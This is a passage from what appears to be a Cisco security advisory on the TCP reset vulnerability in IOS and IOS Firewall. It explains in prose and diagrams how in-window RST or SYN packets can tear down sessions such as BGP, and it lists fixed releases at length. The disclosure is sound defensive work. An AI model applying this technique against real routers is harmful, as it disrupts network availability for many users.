    This attack vector is only applicable to the sessions which are terminating on a device (such as a router, switch, or computer), and not to the sessions that are only passing through the device (for example, transit traffic that is being routed by a router).

    Details

    TCP is the transport layer protocol designed to provide connection-oriented reliable delivery of a data stream. To accomplish this, TCP uses a mixture of flags to indicate state and sequence numbers to identify the order in which the packets are to be reassembled. The acknowledgement number is not used in a packet with the reset (RST) flag set because a reset does not expect a packet in return. The full specification of the TCP protocol can be found at http://www.ietf.org/rfc/rfc0793.txt.

    According to the RFC793 specification, it is possible to reset an established TCP connection by sending a packet with the RST or synchronize (SYN) flag set. However, the sequence number does not have to be an exact match; it is sufficient to fall within the advertised window. This significantly decreases the effort required by an adversary: the larger the window, the easier it is to reset the connection. The destination TCP port is usually known for all standard services (for example, 23 for Telnet, 80 for HTTP). Cisco IOS software uses predictable ephemeral ports for known services with a predictable increment (the next port which will be used for a subsequent connection). These values, while constant for a particular Cisco IOS software version and protocol, can vary from one release to another.

    Here is an example of a normal termination of a TCP session:

                    Host(1)                       Host(2)
                      |                             |
                      |                             |
                      |  ACK ack=1001, window=5000  |
                      |<----------------------------|
                      |                             |
    
    
    
                  Host(1) is
    
             closing the session
    
    
    
                      |        RST seq=1001         |
                      |---------------------------->|
                      |                             |
    
    
    
                                                Host(2) is
    
                                            closing the session
    

    In addition, the following scenario is also permitted:

                    Host(1)                       Host(2)
                      |                             |
                      |                             |
                      |  ACK ack=1001, window=5000  |
                      |<----------------------------|
                      |                             |
    
    
    
                  Host(1) is
    
             closing the session
    
    
    
                      |        RST seq=4321         |
                      |---------------------------->|
                      |                             |
    
    
    
                                                Host(2) is
    
                                            closing the session
    

    Note how, in the second example, the RST packet was able to terminate the session although the sequence number was not the next expected one (which is 1001).

    As a general rule, all protocols where a TCP connection stays established for longer than one minute should be considered exposed.

    The exposure on this vulnerability can be described as follows:

    • Cisco IOS - All devices running Cisco IOS software are vulnerable. Sessions passing through the device are vulnerable only if the originating or receiving device is vulnerable, but they cannot be attacked on the router itself. This vulnerability does not compromise data integrity or confidentiality. It only affects availability.

      This vulnerability is documented in the Cisco Bug Toolkit as Bug IDs CSCed27956 ( registered customers only) and CSCed38527 ( registered customers only) .

    • Cisco IOS Firewall (IOS FW) - The Cisco IOS FW monitors packets passing throughout the router and maintains the session state internally. This way, it is possible to "open" required ports and allow traffic to pass and then close them after the session has finished. Since Cisco IOS FW intercepts and examines all packets passing through the device, all TCP sessions passing through the Cisco IOS FW are vulnerable to this attack. This is valid even if the originating and receiving devices themselves are not vulnerable.

      This vulnerability is documented in the Cisco Bug Toolkit as Bug ID CSCed93836 ( registered customers only) .

    • Network Address Translation (NAT) - This vulnerability does not have any effect on NAT. The NAT functionality simply rewrites ports and IP addresses. This feature does not interprete TCP flags and therefore is not vulnerable to this attack. However, the attacking packet will be passed through the router and the receiving device can be affected.

    Impact

    The impact will be different for each specific protocol. While in the majority of cases a TCP connection will be automatically re-established, in some specific protocols a second order of consequences may have a larger impact than tearing down the connection itself. Both external and internal (eBGP and iBGP) sessions are equally vulnerable. If an adversary tears down a BGP session between two routers, then all routes which were advertised between these two peers will be withdrawn. This would occur immediately for the router which has been attacked and after the next update/keepalive packet is sent by the other router. The BGP peering session itself will be re-established within a minute after the attack. Depending upon the exact routing configuration, withdrawal of the routes may have any of the following consequences:

    • No adverse effects at all if an appropriate static route(s) has(have) been defined on both sides of the affected session.

    • The traffic will be rerouted along other paths. This may cause some congestion along these paths.

    • A portion of the network will be completely isolated and unreachable.

    If a BGP peering session is broken a few times within a short time interval, then BGP route dampening may be invoked. Dampening means that affected routes will be withdrawn from the Internet routing table for some period of time. By default that time is 45 minutes. During that time, all of the traffic whose route was advertised over the attacked BGP session will either be rerouted or a portion of the network will be unreachable. Route dampening is not enabled by default.

    Cisco IOS Firewall Feature Set


    It is possible to terminate an established TCP-based connection even if both endpoints are not vulnerable to this attack.

    Software Versions and Fixes

    Each row of the table describes a release train and the platforms or products for which it is intended. If a given release train is vulnerable, then the earliest possible releases that contain the fix and the anticipated date of availability for each are listed in the Rebuild, Interim, and Maintenance columns. In some cases, no rebuild of a particular release is planned; this is marked with the label "Not scheduled." A device running any release in the given train that is earlier than the release in a specific column (less than the earliest fixed release) is known to be vulnerable, and it should be upgraded at least to the indicated release or a later version (greater than the earliest fixed release label).

    When selecting a release, keep in mind the following definitions:

    • Maintenance Most heavily tested and highly recommended release of any label in a given row of the table.

    • Rebuild Constructed from the previous maintenance or major release in the same train, it contains the fix for a specific vulnerability. Although it receives less testing, it contains only the minimal changes necessary to effect the repair. Cisco has made available several rebuilds of mainline trains to address this vulnerability, but strongly recommends running only the latest maintenance release on mainline trains.

    • Interim Built at regular intervals between maintenance releases and receives less testing. Interims should be selected only if there is no other suitable release that addresses the vulnerability, and interim images should be upgraded to the next available maintenance release as soon as possible. Interim releases are not available through manufacturing, and usually they are not available for customer download from CCO without prior arrangement with the Cisco Technical Assistance Center (TAC).

    In all cases, customers should exercise caution to be certain the devices to be upgraded contain sufficient memory and that current hardware and software configurations will continue to be supported properly by the new release. If the information is not clear, contact the Cisco TAC for assistance, as shown in the section following this table.

    Fixed Cisco IOS Software Images for Cisco IOS Firewall

    +------------+---------------------------------+ | Major | Availability of Repaired | | Release | Releases* | +------------+---------+---------+-------------+ | Affected | Rebuild | Interim | Maintenance | | 12.1-Based | | ** | | | Release | | | | +------------+---------+---------+-------------+ | 12.1 | 12.1 | | | | | (22c) | | | +------------+---------+---------+-------------+ | 12.1E | 12.1 | | | | | (19)E7 | | | | +---------+---------+-------------+ | | | | | +------------+---------+---------+-------------+ | Affected | Rebuild | Interim | Maintenance | | 12.2-Based | | ** | | | Release | | | | +------------+---------+---------+-------------+ | 12.2 | 12.2 | | | | | (21b) | | | | +---------+---------+-------------+ | | 12.2 | | | | | (23a) | | | +------------+---------+---------+-------------+ | 12.2T | 12.2 | | | | | (11)T11 | | | | +---------+---------+-------------+ | | 12.2 | | | | | (13)T12 | | | | +---------+---------+-------------+ | | 12.2 | | | | | (15)T12 | | | +------------+---------+---------+-------------+ | Affected | Rebuild | Interim | Maintenance | | 12.3-Based | | ** | | | Release | | | | +------------+---------+---------+-------------+ | 12.3 | 12.3 | | | | | (5c) | | | | +---------+---------+-------------+ | | 12.3 | | | | | (6a) | | | +------------+---------+---------+-------------+ | 12.3T | 12.3(4) | | | | | T4 | | | +------------+---------+---------+-------------+

    Fixed Cisco IOS Software Releases and Migration Path

    +----------+-------------------------------------+ | Major | Availability of Repaired Releases* | | Release | | +----------+-------------+---------+-------------+ | Affected | Rebuild | Interim | Maintenance | | 11.1 | | ** | | | -Based | | | | | Release | | | | +----------+-------------+---------+-------------+ | 11.1 | 11.1 Vulnerable. Migrate to 11.2 | +----------+-------------------------------------+ | 11.1AA | 11.1AA Vulnerable. Migrate to 11.2P | +----------+-------------------------------------+ | 11.1CC | 11.1CC Vulnerable. Migrate to 12.0 | +----------+-------------+---------+-------------+ | Affected | Rebuild | Interim | Maintenance | | 11.2 | | ** | | | -Based | | | | | Release | | | | +----------+-------------+---------+-------------+ | 11.2 | 11.2(26f) | | | | | Available | | | | | on | | | | | 2004-Apr-21 | | | +----------+-------------+---------+-------------+ | 11.2P | 11.2(26)P6 | | | | | Available | | | | | on | | | | | 2004-Apr-21 | | | +----------+-------------+---------+-------------+ | 11.2SA | 11.2(8)SA6 Vulnerable. Migrate to | | | 12.0 | +----------+-------------+---------+-------------+ | Affected | Rebuild | Interim | Maintenance | | 11.3 | | ** | | | -Based | | | | | Release | | | | +----------+-------------+---------+-------------+ | 11.3 | 11.3 Vulnerable. Migrate to 12.0 | | +-------------+---------+-------------+ | | 11.3(11b)T4 | | | | | Available | | | | | on | | | | | 2004-Apr-21 | | | | +-------------+---------+-------------+ | | 11.3(11e) | | | | | Available | | | | | on | | | | | 2004-Apr-21 | | | +----------+-------------+---------+-------------+ | Affected | Rebuild | Interim | Maintenance | | 12.0 | | ** | | | -Based | | | | | Release | | | | +----------+-------------+---------+-------------+ | 12.0 | 12.0(28) | | | +----------+-------------+---------+-------------+ | 12.0DA | 12.0DA Vulnerable. Migrate to | | | 12.2DA | +----------+-------------------------------------+ | 12.0DB | 12.0DB Vulnerable. Migrate to | | | 12.1DB | +----------+-------------------------------------+ | 12.0DC | 12.0DC Vulnerable. Migrate to | | | 12.1DC | +----------+-------------+---------+-------------+ | 12.0S | 12.0(27)S | | | | +-------------+---------+-------------+ | | 12.0(26)S2 | | | | +-------------+---------+-------------+ | | 12.0(16)S11 | | | | +-------------+---------+-------------+ | | 12.0(24)S5 | | | | +-------------+---------+-------------+ | | 12.0(25)S3 | | | | +-------------+---------+-------------+ | | 12.0(23)S6 | | | +----------+-------------+---------+-------------+ | 12.0SL | 12.0SL Vulnerable. Migrate to 12.0 | | | (23)S3 | +----------+-------------------------------------+ | 12.0ST | 12.0ST Vulnerable. Migrate to 12.0 | | | (26)S2 | +----------+-------------------------------------+ | 12.0SX | 12.0(25)SX4 Not built - contact TAC | +----------+-------------------------------------+ | 12.0SZ | 12.0SZ Vulnerable. Migrate to 12.0 | | | (26)S2 | +----------+-------------------------------------+ | 12.0T | 12.0T Vulnerable. Migrate to 12.1 | +----------+-------------+---------+-------------+ | 12.0W5 | 12.0(28)W5 | | | | | (30) | | | +----------+-------------+---------+-------------+ | 12.0WC | 12.0(5)WC9a | | | | | Available | | | | | on | | | | | 2004-Apr-21 | | | +----------+-------------+---------+-------------+ | 12.0WT | 12.0(13)WT Vulnerable. End of | | | Engineering | +----------+-------------------------------------+ | 12.0WX | 12.0(4)WX Vulnerable. Migrate to | | | 12.0W5 | +----------+-------------------------------------+ | 12.0XA | 12.0(1)XA Vulnerable. Migrate to | | | 12.1 Latest | +----------+-------------------------------------+ | 12.0XB | 12.0(1)XB Vulnerable. Migrate to | | | 12.2(15)T12 | +----------+-------------------------------------+ | 12.0XC | 12.0(2)XC Vulnerable. Migrate to | | | 12.1 Latest | +----------+-------------------------------------+ | 12.0XD | 12.0(2)XD Vulnerable. Migrate to | | | 12.1 Latest | +----------+-------------------------------------+ | 12.0XE | 12.0(7)XE Vulnerable. Migrate to | | | 12.1E Latest | +----------+-------------------------------------+ | 12.0XG | 12.0(3)XG Vulnerable. Migrate to | | | 12.1 Latest | +----------+-------------------------------------+ | 12.0XH | 12.0(4)XH Vulnerable. Migrate to | | | 12.1 | +----------+-------------------------------------+ | 12.0XI | 12.0(4)XI Vulnerable. Migrate to | | | 12.1 | +----------+-------------------------------------+ | 12.0XJ | 12.0(4)XJ Vulnerable. Migrate to | | | 12.1 Latest | +----------+-------------------------------------+ | 12.0XK | 12.0(7)XK Vulnerable. Migrate to | | | 12.1T Latest | +----------+-------------------------------------+ | 12.0XL | 12.0(4)XL Vulnerable. Migrate to | | | 12.2 Latest | +----------+-------------------------------------+ | 12.0XM | 12.0(4)XM Vulnerable. Migrate to | | | 12.2(15)T12 | +----------+-------------------------------------+ | 12.0XN | 12.0(5)XN Vulnerable. Migrate to | | | 12.1 Latest | +----------+-------------------------------------+ | 12.0XP | 12.0(5.1)XP Vulnerable. Migrate to | | | 12.1 Latest | +----------+-------------------------------------+ | 12.0XQ | 12.0(5)XQ Vulnerable. Migrate to | | | 12.1 Latest | +----------+-------------------------------------+ | 12.0XR | 12.0(7)XR Vulnerable. Migrate to | | | 12.2 Latest | +----------+-------------------------------------+ | 12.0XS | 12.0(5)XS Vulnerable. Migrate to | | | 12.1E Latest | +----------+-------------------------------------+ | 12.0XU | 12.0(5)XU Vulnerable. Migrate to | | | 12.0(5)WC | +----------+-------------------------------------+ | 12.0XV | 12.0(7)XV Vulnerable. Migrate to | | | 12.2(15)T12 | +----------+-------------+---------+-------------+ | Affected | Rebuild | Interim | Maintenance | | 12.1 | | ** | | | -Based | | | | | Release | | | | +----------+-------------+---------+-------------+ | 12.1 | 12.1(20a) | | | | +-------------+---------+-------------+ | | 12.1(4c) | | | | +-------------+---------+-------------+ | | 12.1(22a) | | | +----------+-------------+---------+-------------+ | 12.1AA | 12.1(10)AA Vulnerable. Migrate to | | | 12.2 Latest | +----------+-------------+---------+-------------+ | 12.1AX | 12.1(14)AX | | | +----------+-------------+---------+-------------+ | 12.1AY | 12.1(13)AY Vulnerable. Migrate to | | | 12.1(14)EA1 | +----------+-------------------------------------+ | 12.1DA | 12.2DA Vulnerable. Migrate to | | | 12.2DA | +----------+-------------------------------------+ | 12.1DB | 12.1(5)DB Vulnerable. Migrate to | | | 12.2B | +----------+-------------+---------+-------------+ | 12.1E | 12.1(19)E7 | | | | +-------------+---------+-------------+ | | 12.1(22)E1 | | | | +-------------+---------+-------------+ | | 12.1(11b) | | | | | E14 | | | | +-------------+---------+-------------+ | | 12.1(20)E2 Not built - contact TAC | | +-------------+---------+-------------+ | | 12.1(19)E6 | | | | +-------------+---------+-------------+ | | 12.1(13)E13 | | | | +-------------+---------+-------------+ | | 12.1(8b)E18 | | | | +-------------+---------+-------------+ | | 12.1(14)E10 | | | | +-------------+---------+-------------+ | | 12.1(13)E14 | | | +----------+-------------+---------+-------------+ | 12.1EA | 12.1(20)EA1 | | | +----------+-------------+---------+-------------+ | 12.1EB | 12.1(20)EB | | | +----------+-------------+---------+-------------+ | 12.1EC | 12.1(20)EC | | | +----------+-------------+---------+-------------+ | 12.1EO | 12.1(20)EO | | | | +-------------+---------+-------------+ | | 12.1(19)EO2 | | | | | Available | | | | | on | | | | | 2004-Apr-25 | | | +----------+-------------+---------+-------------+ | 12.1EU | 12.1(20)EU | | | +----------+-------------+---------+-------------+ | 12.1EV | 12.1(12c)EV Vulnerable. Migrate to | | | 12.2(RLS4)S | +----------+-------------+---------+-------------+ | 12.1EW | 12.1(20)EW2 | | | | | Available | | | | | on | | | | | 2004-Apr-21 | | | +----------+-------------+---------+-------------+ | 12.1EX | 12.1EX Vulnerable. Migrate to 12.1 | | | (14)E | +----------+-------------------------------------+ | 12.1EY | 12.1(10)EY Vulnerable. Migrate to | | | 12.1(14)E | +----------+-------------+---------+-------------+ | 12.1T | 12.1(5)T17 | | | +----------+-------------+---------+-------------+ | 12.1XA | 12.1(1)XA Vulnerable. Migrate to | | | 12.1(5)T18 | +----------+-------------------------------------+ | 12.1XB | 12.1(1)XB Vulnerable. Migrate to | | | 12.2(15)T12 | +----------+-------------------------------------+ | 12.1XC | 12.1(1)XC Vulnerable. Migrate to | | | 12.2 | +----------+-------------------------------------+ | 12.1XD | 12.1(1)XD Vulnerable. Migrate to | | | 12.2 | +----------+-------------------------------------+ | 12.1XE | 12.1(1)XE Vulnerable. Migrate to | | | 12.1E Latest | +----------+-------------------------------------+ | 12.1XF | 12.1(2)XF Vulnerable. Migrate to | | | 12.2(15)T12 | +----------+-------------------------------------+ | 12.1XG | 12.1(3)XG Vulnerable. Migrate to | | | 12.2(15)T12 | +----------+-------------------------------------+ | 12.1XH | 12.1(2a)XH Vulnerable. Migrate to | | | 12.2 | +----------+-------------------------------------+ | 12.1XI | 12.1(3a)XI Vulnerable. Migrate to | | | 12.2 Latest | +----------+-------------------------------------+ | 12.1XJ | 12.1(3)XJ Vulnerable. Migrate to | | | 12.2(15)T12 | +----------+-------------------------------------+ | 12.1XL | 12.1(3)XL Vulnerable. Migrate to | | | 12.2T Latest | +----------+-------------------------------------+ | 12.1XM | 12.1(5)XM Vulnerable. Migrate to | | | 12.2T Latest | +----------+-------------------------------------+ | 12.1XP | 12.1(3)XP Vulnerable. Migrate to | | | 12.2(15)T12 | +----------+-------------------------------------+ | 12.1XQ | 12.1(3)XQ Vulnerable. Migrate to | | | 12.2T Latest | +----------+-------------------------------------+ | 12.1XR | 12.1(5)XR Vulnerable. Migrate to | | | 12.2T Latest | +----------+-------------------------------------+ | 12.1XT | 12.1(3)XT Vulnerable. Migrate to | | | 12.2(15)T12 | +----------+-------------------------------------+ | 12.1XU | 12.1(5)XU Vulnerable. Migrate to | | | 12.2T Latest | +----------+-------------------------------------+ | 12.1XV | 12.1(5)XV Vulnerable. Migrate to | | | 12.2XB | +----------+-------------------------------------+ | 12.1YA | 12.1(5)YA Vulnerable. Migrate to | | | 12.2(8)T | +----------+-------------------------------------+ | 12.1YB | 12.1(5)YB Vulnerable. Migrate to | | | 12.2(15)T12 | +----------+-------------------------------------+ | 12.1YC | 12.1(5)YC Vulnerable. Migrate to | | | 12.2(15)T12 | +----------+-------------------------------------+ | 12.1YD | 12.1(5)YD Vulnerable. Migrate to | | | 12.2(8)T | +----------+-------------------------------------+ | 12.1YE | 12.1(5)YE5 Vulnerable. Migrate to | | | 12.2(2)YC | +----------+-------------------------------------+ | 12.1YF | 12.1(5)YF2 Vulnerable. Migrate to | | | 12.2(2)YC | +----------+-------------------------------------+ | 12.1YH | 12.1(5)YH2 Vulnerable. Migrate to | | | 12.2(13)T | +----------+-------------------------------------+ | 12.1YI | 12.1(5)YI2 Vulnerable. Migrate to | | | 12.2(2)YC | +----------+-------------------------------------+ | 12.1YJ | 12.1(11)YJ Vulnerable. Migrate to | | | 12.1EA Latest | +----------+-------------+---------+-------------+ | Affected | Rebuild | Interim | Maintenance | | 12.2 | | ** | | | -Based | | | | | Release | | | | +----------+-------------+---------+-------------+ | 12.2 | 12.2(19b) | | | | +-------------+---------+-------------+ | | 12.2(16f) | | | | +-------------+---------+-------------+ | | 12.2(21a) | | | | +-------------+---------+-------------+ | | 12.2(23) | | | | +-------------+---------+-------------+ | | 12.2(12i) | | | | +-------------+---------+-------------+ | | 12.2(10g) | | | | +-------------+---------+-------------+ | | 12.2(13e) | | | | +-------------+---------+-------------+ | | 12.2(17d) | | | | +-------------+---------+-------------+ | | 12.2(21b) | | | | +-------------+---------+-------------+ | | 12.2(23a) | | | +----------+-------------+---------+-------------+ | 12.2B | 12.2(2)B - 12.2(4)B7 Vulnerable. | | | Migrate to 12.2(13)T12 | | +-------------------------------------+ | | 12.2(4)B8 AND FWD Vulnerable. | | | Migrate to 12.3(5a)B1 | +----------+-------------+---------+-------------+ | 12.2BC | 12.2(15) | | | | | BC1C | | | +----------+-------------+---------+-------------+ | 12.2BW | 12.2(4)BW Vulnerable. Migrate to | | | 12.2(15)T12 | +----------+-------------+---------+-------------+ | 12.2BX | 12.2(16)BX2 | | | +----------+-------------+---------+-------------+ | 12.2BY | 12.2(4)BY Vulnerable. Migrate to | | | 12.2(15)B | | +-------------------------------------+ | | 12.2(8)BY Vulnerable. Migrate to | | | 12.2(8)ZB | | +-------------------------------------+ | | 12.2(2)BY Vulnerable. Migrate to | | | 12.2(8)BZ | +----------+-------------------------------------+ | 12.2BZ | 12.2(15)BZ Vulnerable. Migrate to | | | 12.2(16)BX | +----------+-------------------------------------+ | 12.2CX | 12.2(11)CX Vulnerable. Migrate to | | | 12.2(15)BC | +----------+-------------------------------------+ | 12.2CY | 12.2(11)CY Vulnerable. Migrate to | | | 12.2(13)BC1C | +----------+-------------------------------------+ | 12.2DD | 12.2DD Vulnerable. Migrate to 12.2 | | | (4)B1 | +----------+-------------------------------------+ | 12.2DX | 12.2(1)DX Vulnerable. Migrate to | | | 12.2DD | | +-------------------------------------+ | | 12.2(2)DX Vulnerable. Migrate to | | | 12.2B Latest | +----------+-------------+---------+-------------+ | 12.2EW | 12.2(18)EW | | | +----------+-------------+---------+-------------+ | 12.2JA | 12.2(13)JA4 | | | | +-------------+---------+-------------+ | | 12.2(13)JA2 | | | | +-------------+---------+-------------+ | | 12.2(11)JA3 | | | +----------+-------------+---------+-------------+ | 12.2MC | 12.2(15) | | | | | MC1B | | | +----------+-------------+---------+-------------+ | 12.2S | 12.2(22)S | | | | +-------------+---------+-------------+ | | 12.2(14)S7 | | | | +-------------+---------+-------------+ | | 12.2(20)S1 | | | | +-------------+---------+-------------+ | | 12.2(20)S3 | | | | | Available | | | | | on | | | | | 2004-Apr-21 | | | | +-------------+---------+-------------+ | | 12.2(18)S3 | | | +----------+-------------+---------+-------------+ | 12.2SE | 12.2(18)SE | | | +----------+-------------+---------+-------------+ | 12.2SW | 12.2(21)SW | | | +----------+-------------+---------+-------------+ | 12.2SX | 12.2(17a) | | | | | SX2 | | | +----------+-------------+---------+-------------+ | 12.2SXA | 12.2(17b) | | | | | SXA1 | | | +----------+-------------+---------+-------------+ | 12.2SXB | 12.2(17d)SXB1 Not built - contact | | | TAC | +----------+-------------+---------+-------------+ | 12.2SY | 12.2(14)SY3 | | | +----------+-------------+---------+-------------+ | 12.2SZ | 12.2(14)SZ6 | | | +----------+-------------+---------+-------------+ | 12.2T | 12.2(15)T11 | | | | +-------------+---------+-------------+ | | 12.2(13)T12 | | | | +-------------+---------+-------------+ | | 12.2(11)T11 Not built - contact TAC | | +-------------+---------+-------------+ | | 12.2(13)T11 | | | +----------+-------------+---------+-------------+ | 12.2XA | 12.2(2)XA Vulnerable. Migrate to | | | 12.2(11)T | +----------+-------------------------------------+ | 12.2XB | 12.2(2)XB Vulnerable. Migrate to | | | 12.2(15)T | +----------+-------------------------------------+ | 12.2XC | 12.2(2)XC Vulnerable. Migrate to | | | 12.2(8)ZB | +----------+-------------------------------------+ | 12.2XD | 12.2(1)XD Vulnerable. Migrate to | | | 12.2(15)T12 | +----------+-------------------------------------+ | 12.2XE | 12.2(1)XE Vulnerable. Migrate to | | | 12.2(15)T12 | +----------+-------------------------------------+ | 12.2XF | 12.2(1)XF1 Vulnerable. Migrate to | | | 12.2(4)BC1C | +----------+-------------------------------------+ | 12.2XG | 12.2(2)XG Vulnerable. Migrate to | | | 12.2(8)T | +----------+-------------------------------------+ | 12.2XH | 12.2(2)XH Vulnerable. Migrate to | | | 12.2(15)T12 | +----------+-------------------------------------+ | 12.2XI | 12.2(2)XI2 Vulnerable. Migrate to | | | 12.2(15)T12 | +----------+-------------------------------------+ | 12.2XJ | 12.2(2)XJ Vulnerable. Migrate to | | | 12.2(15)T12 | +----------+-------------------------------------+ | 12.2XK | 12.2(2)XK Vulnerable. Migrate to | | | 12.2(15)T12 | +----------+-------------------------------------+ | 12.2XL | 12.2(4)XL Vulnerable. Migrate to | | | 12.2(15)T12 | +----------+-------------------------------------+ | 12.2XM | 12.2(4)XM Vulnerable. Migrate to | | | 12.2(15)T12 | +----------+-------------------------------------+ | 12.2XN | 12.2(2)XN Vulnerable. Migrate to | | | 12.2(11)T | +----------+-------------------------------------+ | 12.2XQ | 12.2(2)XQ Vulnerable. Migrate to | | | 12.2(15)T12 | +----------+-------------------------------------+ | 12.2XS | 12.2(1)XS Vulnerable. Migrate to | | | 12.2(11)T | +----------+-------------------------------------+ | 12.2XT | 12.2(2)XT Vulnerable. Migrate to | | | 12.2(11)T | +----------+-------------------------------------+ | 12.2XU | 12.2(2)XU Vulnerable. Migrate to | | | 12.2(15)T12 | +----------+-------------------------------------+ | 12.2XW | 12.2(4)XW Vulnerable. Migrate to | | | 12.2(13)T12 | +----------+-------------------------------------+ | 12.2YA | 12.2(4)YA Vulnerable. Migrate to | | | 12.2(15)T12 | +----------+-------------------------------------+ | 12.2YB | 12.2(4)YB Vulnerable. Migrate to | | | 12.2(15)T12 | +----------+-------------------------------------+ | 12.2YC | 12.2(2)YC Vulnerable. Migrate to | | | 12.2(11)T11 | +----------+-------------------------------------+ | 12.2YD | 12.2(8)YD Vulnerable. Migrate to | | | 12.2(8)YY | +----------+-------------------------------------+ | 12.2YE | 12.2(9)YE Vulnerable. Migrate to | | | 12.2S | +----------+-------------------------------------+ | 12.2YF | 12.2(4)YF Vulnerable. Migrate to | | | 12.2(15)T12 | +----------+-------------------------------------+ | 12.2YG | 12.2(4)YG Vulnerable. Migrate to | | | 12.2(13)T12 | +----------+-------------------------------------+ | 12.2YH | 12.2(4)YH Vulnerable. Migrate to | | | 12.2(15)T12 | +----------+-------------------------------------+ | 12.2YJ | 12.2(8)YJ Vulnerable. Migrate to | | | 12.2(15)T12 | +----------+-------------------------------------+ | 12.2YK | 12.2(2)YK Vulnerable. Migrate to | | | 12.2(13)ZC | +----------+-------------------------------------+ | 12.2YL | 12.2(8)YL Vulnerable. Migrate to | | | 12.3(2)T | +----------+-------------------------------------+ | 12.2YM | 12.2(8)YM Vulnerable. Migrate to | | | 12.3(2)T | +----------+-------------------------------------+ | 12.2YN | 12.2(8)YN Vulnerable. Migrate to | | | 12.3(2)T | +----------+-------------------------------------+ | 12.2YO | 12.2(9)YO Vulnerable. Migrate to | | | 12.2(14)SY | +----------+-------------------------------------+ | 12.2YP | 12.2(11)YP Vulnerable. Migrate to | | | 12.2T Latest | +----------+-------------------------------------+ | 12.2YQ | 12.2(11)YQ Vulnerable. Migrate to | | | 12.3(2)T | +----------+-------------------------------------+ | 12.2YR | 12.2(11)YR Vulnerable. Migrate to | | | 12.3(2)T | +----------+-------------------------------------+ | 12.2YS | 12.2(11)YS Vulnerable. Migrate to | | | 12.3T | +----------+-------------------------------------+ | 12.2YT | 12.2(11)YT Vulnerable. Migrate to | | | 12.2(15)T | +----------+-------------------------------------+ | 12.2YU | 12.2(11)YU Vulnerable. Migrate to | | | 12.3(2)T | +----------+-------------------------------------+ | 12.2YV | 12.2(11)YV Vulnerable. Migrate to | | | 12.3(4)T | +----------+-------------------------------------+ | 12.2YW | 12.2(8)YW Vulnerable. Migrate to | | | 12.3(2)T | +----------+-------------------------------------+ | 12.2YX | 12.2(11)YX Vulnerable. Migrate to | | | 12.2(RLS3)S | +----------+-------------------------------------+ | 12.2YY | 12.2(8)YY Vulnerable. Migrate to | | | 12.3(1)T | +----------+-------------------------------------+ | 12.2YZ | 12.2(11)YZ Vulnerable. Migrate to | | | 12.2(14)SZ | +----------+-------------+---------+-------------+ | 12.2ZA | 12.2(14)ZA6 | | | +----------+-------------+---------+-------------+ | 12.2ZB | 12.2(8)ZB Vulnerable. Migrate to | | | 12.3T | +----------+-------------------------------------+ | 12.2ZC | 12.2(13)ZC Vulnerable. Migrate to | | | 12.3T | +----------+-------------+---------+-------------+ | 12.2ZD | 12.2(13)ZD1 | | | +----------+-------------+---------+-------------+ | 12.2ZE | 12.2(13)ZE Vulnerable. Migrate to | | | 12.3 | +----------+-------------------------------------+ | 12.2ZF | 12.2(13)ZF Vulnerable. Migrate to | | | 12.3(4)T | +----------+-------------------------------------+ | 12.2ZG | 12.2(13)ZG Vulnerable. Migrate to | | | 12.3(4)T | +----------+-------------------------------------+ | 12.2ZH | 12.2(13)ZH Vulnerable. Migrate to | | | 12.3(4)T | +----------+-------------------------------------+ | 12.2ZI | 12.2(11)ZI Vulnerable. Migrate to | | | 12.2(18)S | +----------+-------------+---------+-------------+ | 12.2ZJ | 12.2(15)ZJ5 | | | | +-------------+---------+-------------+ | | 12.2(15)ZJ4 | | | +----------+-------------+---------+-------------+ | 12.2ZK | 12.2(15)ZK Vulnerable. Migrate to | | | 12.3T | +----------+-------------------------------------+ | 12.2ZL | 12.2(15)ZL Vulnerable. Migrate to | | | 12.3(7)T | +----------+-------------------------------------+ | 12.2ZN | 12.2(15)ZN Vulnerable. Migrate to | | | 12.3(2)T | +----------+-------------+---------+-------------+ | 12.2ZP | 12.2(13)ZP3 | | | +----------+-------------+---------+-------------+ | Affected | Rebuild | Interim | Maintenance | | 12.3 | | ** | | | -Based | | | | | Release | | | | +----------+-------------+---------+-------------+ | 12.3 | 12.3(3e) | | | | +-------------+---------+-------------+ | | 12.3(6) | | | | +-------------+---------+-------------+ | | 12.3(5b) | | | +----------+-------------+---------+-------------+ | 12.3B | 12.3(5a)B | | | | +-------------+---------+-------------+ | | 12.3(3)B1 | | | +----------+-------------+---------+-------------+ | 12.3BW | 12.3(1a)BW Vulnerable. Migrate to | | | 12.3B | +----------+-------------+---------+-------------+ | 12.3T | 12.3(2)T4 | | | | +-------------+---------+-------------+ | | 12.3(7)T1 Not built - contact TAC | | +-------------+---------+-------------+ | | 12.3(4)T3 | | | +----------+-------------+---------+-------------+ | 12.3XA | 12.3(2)XA Vulnerable. Contact TAC. | +----------+-------------+---------+-------------+ | 12.3XB | 12.3(2)XB2 | | | +----------+-------------+---------+-------------+ | 12.3XC | 12.3(2)XC2 | | | +----------+-------------+---------+-------------+ | 12.3XD | 12.3(4)XD1 | | | +----------+-------------+---------+-------------+ | 12.3XE | 12.3(2)XE Vulnerable. Migrate to | | | 12.3T | +----------+-------------------------------------+ | 12.3XF | 12.3(2)XF Vulnerable. Contact TAC | | | if needed. | +----------+-------------+---------+-------------+ | 12.3XG | 12.3(4)XG | | | +----------+-------------+---------+-------------+ | 12.3XH | 12.3(4)XH | | | +----------+-------------+---------+-------------+ | 12.3XI | 12.3(7)XI Vulnerable. Migrate to | | | 12.3T | +----------+-------------------------------------+ | 12.3XJ | 12.3(7)XJ Vulnerable. Contact TAC | | | if needed | +----------+-------------+---------+-------------+ | 12.3XK | 12.3(4)XK | | | +----------+-------------+---------+-------------+ | 12.3XL | 12.3(7)XL Vulnerable. Contact Tac | | | if needed | +----------+-------------------------------------+ | 12.3XM | 12.3(9)XM Vulnerable. Contact TAC | | | if needed. | +----------+-------------------------------------+ | 12.3XN | 12.3(4)XN Vulnerable. Contact TAC | | | if needed. | +----------+-------------------------------------+ | 12.3XQ | 12.3(4)XQ Vulnerable. Contact TAC | | | if needed. | +----------+-------------------------------------+ | * All dates are estimated and subject to | | change. | | | | ** Interim releases are subjected to less | | rigorous testing than regular maintenance | | releases, and may have serious bugs. | +------------------------------------------------+

    Obtaining Fixed Software

    Customers with Service Contracts

    Customers with contracts should obtain upgraded software through their regular update channels. For most customers, this means that upgrades should be obtained through the Software Center on Cisco's worldwide website at http://www.cisco.com.

    Customers using Third-party Support Organizations

    Customers whose Cisco products are provided or maintained through prior or existing agreement with third-party support organizations such as Cisco Partners, authorized resellers, or service providers should contact that support organization for assistance with the upgrade, which should be free of charge.

    Customers without Service Contracts

